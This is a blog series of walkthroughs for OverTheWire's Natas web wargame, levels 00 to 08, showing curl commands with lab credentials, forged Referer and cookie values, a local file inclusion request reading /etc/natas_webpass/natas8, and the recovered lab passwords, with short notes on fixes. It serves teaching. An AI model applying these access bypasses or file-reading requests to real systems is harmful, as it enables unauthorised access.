Tuesday 30 September 2014

Wargames - Natas 08

Tags: , , , ,
<< Previous challenge

Recommended reading:
From the credentials discovered from the previous challenge, head up to http://natas8.natas.labs.overthewire.org and take a look at its content. This challenge is very similar to level 06. We have a form that takes a secret and if matches the correct secret, we get the password for the next level. Again they disclose the full source code, let's take a look:
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas8", "pass": "<censored>" };</script></head>
<body>
<h1>natas8</h1>
<div id="content">

<?

$encodedSecret = "3d3d516343746d4d6d6c315669563362";

function encodeSecret($secret) {
    return bin2hex(strrev(base64_encode($secret)));
}

if(array_key_exists("submit", $_POST)) {
    if(encodeSecret($_POST['secret']) == $encodedSecret) {
    print "Access granted. The password for natas9 is <censored>";
    } else {
    print "Wrong secret";
    }
}
?>

<form method=post>
Input secret: <input name=secret><br>
<input type=submit name=submit>
</form>

<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>
</html>
The code we see from line 23 to 29 is pretty familiar, it's the same that we saw on level 06, what's new here is the encodeSecret function, it takes a $secret and encodes it, the parameter it takes is the value we submit on the form, which is then compared to the $encodedSecret, which they also provide. I think the course of action is pretty straight forward, we need to take the encoded string and reverse it, we can easily do this because we know how it's encoded in the first place:
encoding:
base64_encode -> strrev -> bin2hex
decoding:
hex2bin -> strrev -> base64_decode
Writing the decoding function is pretty easy:
function decodeSecret($secret) {
    return base64_decode(strrev(hex2bin($secret)));
}
One important thing to note here is that hex2bin function only exists in PHP 5.4.0 or greater. Another even more important thing to note is how bin2hex and hex2bin work. bin2hex takes an ASCII string and converts each of it's characters to hexadecimal, the hex2bin does the opposite, as an example:
bin2hex("A"); # returns "41"
hex2bin("41"); # returns "A"

bin2hex("Hi"); # returns "4869"
hex2bin("4869"); # returns "Hi"
You can take an ASCII table and manually make the conversion.
Now we just apply the decode function to the encoded secret (using some online PHP sandbox) and get the decoded secret:
oubWYf2kBq
Following what we did on level 06, we send the decoded secret and get the password.
curl --data "submit=submit&secret=oubWYf2kBq" http://natas8:DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe@natas8.natas.labs.overthewire.org/
Which results in:
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas8", "pass": "DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe" };</script></head>
<body>
<h1>natas8</h1>
<div id="content">

Access granted. The password for natas9 is W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl
<form method=post>
Input secret: <input name=secret><br>
<input type=submit name=submit>
</form>

<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>
</html>
Access granted and on line 15 we get the password we want.

User natas9
Password W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl

Fairly simple challenge if you have some programming basics. We just had to reverse a function, this could have been much harder if we didn't have the encoded secret and the encode function.

Never Settle,

<< Previous challenge
Posted by at No comments:

Monday 29 September 2014

Wargames - Natas 07

Tags: , , , ,
<< Previous challenge

Recommended reading:
From the credentials discovered from the previous challenge, head up to http://natas7.natas.labs.overthewire.org and take a look at its content. Now that we have some familiarity with PHP, it's time throw in a vulnerability know as local file inclusion, let's get started.
Level 07 is a simple page with a menu, Home and About. Navigation on the page is done by passing parameters on a GET Request to index.php file, you can see that the URL changes:
http://natas7.natas.labs.overthewire.org/index.php?page=home
http://natas7.natas.labs.overthewire.org/index.php?page=about
The yellow background shows what GET parameters are passed. I'll leave it to you to try and navigate to /home and /about. Another tip is commented on the source, I'll also leave it to you.
Our guess here is that the page does some include depending on the requested page. I hope that by now things are pretty obvious (if you read the tip in the source code), the only thing we need is to make a request where the page=/etc/natas_webpass/natas8. You can simply make it through the browser or using curl:
curl "http://natas7:7z3hEENjQtflzgnT29q7wAvMNfZdh0i9@natas7.natas.labs.overthewire.org/index.php?page=/etc/natas_webpass/natas8"
And our result:
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas7", "pass": "7z3hEENjQtflzgnT29q7wAvMNfZdh0i9" };</script></head>
<body>
<h1>natas7</h1>
<div id="content">

<a href="index.php?page=home">Home</a>
<a href="index.php?page=about">About</a>
<br>
<br>
DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe

<!-- hint: password for webuser natas8 is in /etc/natas_webpass/natas8 -->
</div>
</body>
</html>
The contents of natas8 file is included on the page, as you can see in line 19.

User natas8
Password DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe

Another challenge down, interesting one, but pretty simple. This type of vulnerabilities usually arise from poor coding practices. If you check the link in the recommended reading, it explains how to avoid this vulnerability.
This file inclusion vulnerability is basically the same as directory traversal, in case you're wondering.

Never Settle,

<< Previous challenge
Posted by at No comments:

Sunday 28 September 2014

Wargames - Natas 06

Tags: , , , ,
<< Previous challenge

Recommended reading:
From the credentials discovered from the previous challenge, head up to http://natas6.natas.labs.overthewire.org and take a look at its content. This challenge involves some basic programming knowledge, PHP knowledge to be more specific, what it is and how it works.
This webpage contains a simple form, with a textbox and a button. We start by exploring the webpage: introducing some random characters on the textbox and submitting the form results on a "Wrong secret". We can assume that if we introduce the correct secret, we get the password for the next level.
They're kind enough to show us the full source code, which includes the PHP code that is executed on the server side, which you normally don't have access, since it's executed on the server. Here's what we have access to:
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas6", "pass": "<censored>" };</script></head>
<body>
<h1>natas6</h1>
<div id="content">

<?

include "includes/secret.inc";

    if(array_key_exists("submit", $_POST)) {
        if($secret == $_POST['secret']) {
        print "Access granted. The password for natas7 is <censored>";
    } else {
        print "Wrong secret";
    }
    }
?>

<form method=post>
Input secret: <input name=secret><br>
<input type=submit name=submit>
</form>

<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>
</html>
The HTML code is pretty much the same we've seen on previous challenges, the thing we want to analyze here is the PHP code. It's simple business logic code, if there's a POST request and the secret POST variable matches the $secret variable, it prints the password we want. From the code, we also assume that $secret is defined in that secret.inc file. It's as simple as navigating to includes/secret.inc, and this is what we get:
1
2
3
<?
$secret = "FOEIUWGHFEEUHOFUOIU";
?>
Now that we have the secret, we can use the form on the page to submit it. I'm gonna do it using curl, why? Because I can, and practicing these commands never hurts:
curl --data "submit=submit&secret=FOEIUWGHFEEUHOFUOIU" http://natas6:aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1@natas6.natas.labs.overthewire.org
We send the secret and the submit variable as data, submit is also needed, the code also checks for that variable.
And the result:
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas6", "pass": "aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1" };</script></head>
<body>
<h1>natas6</h1>
<div id="content">

Access granted. The password for natas7 is 7z3hEENjQtflzgnT29q7wAvMNfZdh0i9
<form method=post>
Input secret: <input name=secret><br>
<input type=submit name=submit>
</form>

<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>
</html>
Voilà, we get the password for natas7 in line 15, pretty straight forward.

User natas7
Password 7z3hEENjQtflzgnT29q7wAvMNfZdh0i9

What's important to grasp here is the way the include file was set. The file has a .inc extension, which is fine, but in this case the server wasn't configured to parse the .inc as a PHP file, meaning when we open it, the server displays the file as plain text, revealing the PHP code.
Just like level 03 and level 02, this exploitation results from a poorly configured web server. Three easy solutions for this are: use .inc.php extension, always get parsed, deny access to any .inc files or configure the web server to parse .inc files.

Never Settle,

<< Previous challenge
Posted by at No comments:

Saturday 27 September 2014

Wargames - Natas 05

Tags: , , , ,
<< Previous challenge

Recommended reading:
From the credentials discovered from the previous challenge, head up to http://natas5.natas.labs.overthewire.org and take a look at its content. You can also look at the source code, but it won't help much:
Access disallowed. You are not logged in
This challenge is about cookies. Cookies take a good part in exploitation and you should always, at some point, look at the cookies being set by the server, as they can help you a lot.
This time we're going to use curl with grep to see what cookies are being set (you can also just use your browser developer mode):
curl -I http://natas5:iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq@natas5.natas.labs.overthewire.org/ | grep "Set-Cookie:"
the -I flag tells curl to make a HEAD request, which only returns the headers. We then pipe it to grep and search for "Set-Cookie:", the header that sets cookies, and this is what we get:
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
Set-Cookie: loggedin=0
So apparently the server sets a cookie named loggedin=0. I guess it's not hard to guess what we want to do next, which is to set that cookie to 1. In order to do this, we just run this command:
curl --cookie loggedin=1 http://natas5:iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq@natas5.natas.labs.overthewire.org/
And this is what we get:
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas5", "pass": "iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq" };</script></head>
<body>
<h1>natas5</h1>
<div id="content">
Access granted. The password for natas6 is aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1</div>
</body>
</html>
We're greeted with the password for natas6 in line 14.

User natas6
Password aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1

Pretty simple challenge, just so people get familiar with cookies and their usage.

Never Settle,

<< Previous challenge
Posted by at No comments:

Friday 26 September 2014

Wargames - Natas 04

Tags: , , , ,
<< Previous challenge

Recommended reading:
From the credentials discovered from the previous challenge, head up to http://natas4.natas.labs.overthewire.org and take a look at the page. This time around, you can look at the source all you want, but there's nothing interesting there.
Let's look at the information they give us when we first open the page:
1
Access disallowed. You are visiting from "" while authorized users should come only from "http://natas5.natas.labs.overthewire.org/"
Now's let's do the only thing we can actually do on this page, press the refresh page link:
1
Access disallowed. You are visiting from "http://natas4.natas.labs.overthewire.org/" while authorized users should come only from "http://natas5.natas.labs.overthewire.org/"
I hope the difference is easy enough to spot. When we enter the page the first time, the server doesn't know from which link we got there, when we use the refresh page link, it knows from where we visited, which is our actual link.
Now in order to understand this, one must have some notions on how HTTP works, specifically HTTP Headers. There's a request header called Referer (should be Referrer, but people can't type!), that has the following definition (quoted from Wikipedia): "This is the address of the previous web page from which a link to the currently requested page was followed." Simply put, when we press a link, the destination page will get a Referer header that will have have the URL of the page we came from, easy right?
We know how this works, how can we exploit it? If you remember level01, we used curl to fetch the page, in this challenge we're going to do the same thing, but with extra parameters so we can set the header the way we like it, and here's how it looks like:
1
curl --referer "http://natas5.natas.labs.overthewire.org/" http://natas4:Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ@natas4.natas.labs.overthewire.org/
We execute the command and get this output:
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas4", "pass": "Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ" };</script></head>
<body>
<h1>natas4</h1>
<div id="content">

Access granted. The password for natas5 is iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq
<br/>
<div id="viewsource"><a href="index.php">Refresh page</a></div>
</div>
</body>
</html>
And just like that, in line 15 we have the password for natas5.

User natas5
Password iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq

One more challenge down, this one required some protocol knowledge in order to exploit, but I'm sure it's still pretty accessible to most. Things are starting to get interesting!

Never Settle,

<< Previous challenge
Posted by at No comments:

Thursday 25 September 2014

Wargames - Natas 03

Tags: , , , ,
<< Previous challenge

Recommended reading:
From the credentials discovered from the previous challenge, head up to http://natas3.natas.labs.overthewire.org and take a look at the page. Like the previous challenges, "There's nothing on this page", source code? Yup...
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas3", "pass": "sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14" };</script></head>
<body>
<h1>natas3</h1>
<div id="content">
There is nothing on this page
<!-- No more information leaks!! Not even Google will find it this time... -->
</div>
</body></html>
On this challenge there's nothing that directly connects the page to what we're after, all we have to begin with is that comment on line 15. It suggests something about google (not) finding stuff. What they're talking about is a file named robots.txt. I'll leave it to you to find it's location. Let's see its content:
1
2
User-agent: *
Disallow: /s3cr3t/
Short and simple, it says that all robots should ignore the /s3cr3t/ directory. Now, taking advantage of directory listings like we did on the previous challenge, we can head to said directory and find yet another users.txt, that only contains the user and password for the next challenge:

User natas4
Password Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ

We're starting to put together the skills we've acquired in the previous challenges to achieve our goal, this challenge added the robots.txt file, that together with viewing the source code and the knowledge of directory listings, allowed us to get the so desired password.

Never Settle,

<< Previous challenge
Posted by at No comments:

Wednesday 24 September 2014

Wargames - Natas 02

Tags: , , , ,
<< Previous challenge

Recommended reading:
Using the credentials discovered from the previous challenge, let's login into this third one.

We head up to http://natas2.natas.labs.overthewire.org and once again see a very simple webpage, with nothing to interact with, we're even told "There's nothing on this page". I hope you already know the drill, time to take a look at the source code:
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas2", "pass": "ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi" };</script></head>
<body>
<h1>natas2</h1>
<div id="content">
There is nothing on this page
<img src="files/pixel.png">
</div>
</body></html>
This time around, things are not so obvious. Taking a look at the body of the page, however, there's an img tag that links to a 1x1 PNG image. The image itself is not very revealing, what we're looking here is its link, it's under a directory called files, let's head to http://natas2.natas.labs.overthewire.org/files/. Looks like there's a users.txt file. Shall we open it?
1
2
3
4
5
6
7
# username:password
alice:BYNdCesZqW
bob:jw2ueICLvT
charlie:G5vCxkVV3m
natas3:sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14
eve:zo4mJWyNj2
mallory:9urtcpzBmH
Wasn't that hard after all, looking at line 5 of this file, we can see the password we're looking for.

User natas3
Password sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14

In this challenge we took advantage of directory listings, I recommend you read the provided link, which will explain in detail what it is. This type of exploitation results from poorly configured HTTP servers.

Never Settle,

<< Previous challenge
Posted by at No comments:

Tuesday 23 September 2014

Wargames - Natas 01

Tags: , , , ,
<< Previous challenge

Recommended reading:
  • curl (basic stuff only)
Using the credentials discovered from the previous challenge, let's login into this second one.

We head up to http://natas1.natas.labs.overthewire.org and again see a very simple webpage, with nothing to interact with, the difference with this challenge is that we're told right-clicking has been blocked. This should be an obvious clue that they're trying to hide something on the source code.
Shortcuts come handy in this challenge, you can press F12 or CTRL+U to take a look at the source code, alternatively, if you couldn't use shortcuts either, you could use curl to get the page, and here's the command to do so:
curl http://natas1:gtVrDuiDfck831PqWsLEZy5gyDz1clto@natas1.natas.labs.overthewire.org
So here's the super protected source code:
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas1", "pass": "gtVrDuiDfck831PqWsLEZy5gyDz1clto" };</script></head>
<body oncontextmenu="javascript:alert('right clicking has been blocked!');return false;">
<h1>natas1</h1>
<div id="content">
You can find the password for the
next level on this page, but rightclicking has been blocked!

<!--The password for natas2 is ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi -->
</div>
</body>
</html>
And again, as simple as level 00, looking at line 17 gives us the credentials for level 02:

User natas2
Password ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi

Again a very simple level, but just as I mentioned in level 00, sometimes developers forget to remove important comments that reveal sensitive information. Furthermore, spotting that right-clicking as been blocked should be indicative that they're trying to hide something in the source code.

Never Settle,

<< Previous challenge
Posted by at No comments:

Monday 22 September 2014

Wargames - Natas 00

Tags: , , , ,
Recommended reading:
Information about this wargame can be found at http://overthewire.org/wargames/natas/.

Let's start by logging in using the credentials they provide us.

We head up to http://natas0.natas.labs.overthewire.org and see a very simple webpage, with nothing to interact with, our best option is to start looking at the source code:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas0", "pass": "natas0" };</script></head>
<body>
<h1>natas0</h1>
<div id="content">
You can find the password for the next level on this page.

<!--The password for natas1 is gtVrDuiDfck831PqWsLEZy5gyDz1clto -->
</div>
</body>
</html>

Pretty simple isn't it? Looking at line 16 gives us the credentials for level 01:

User natas1
Password gtVrDuiDfck831PqWsLEZy5gyDz1clto

This level is really simple, although it's supposed to be this way, there's more to it than you think, sometimes developers do forget to remove important information from the comments. OWASP mentions it on OTG-INFO-005.

Never Settle,
Posted by at No comments:
Subscribe to: Posts (Atom)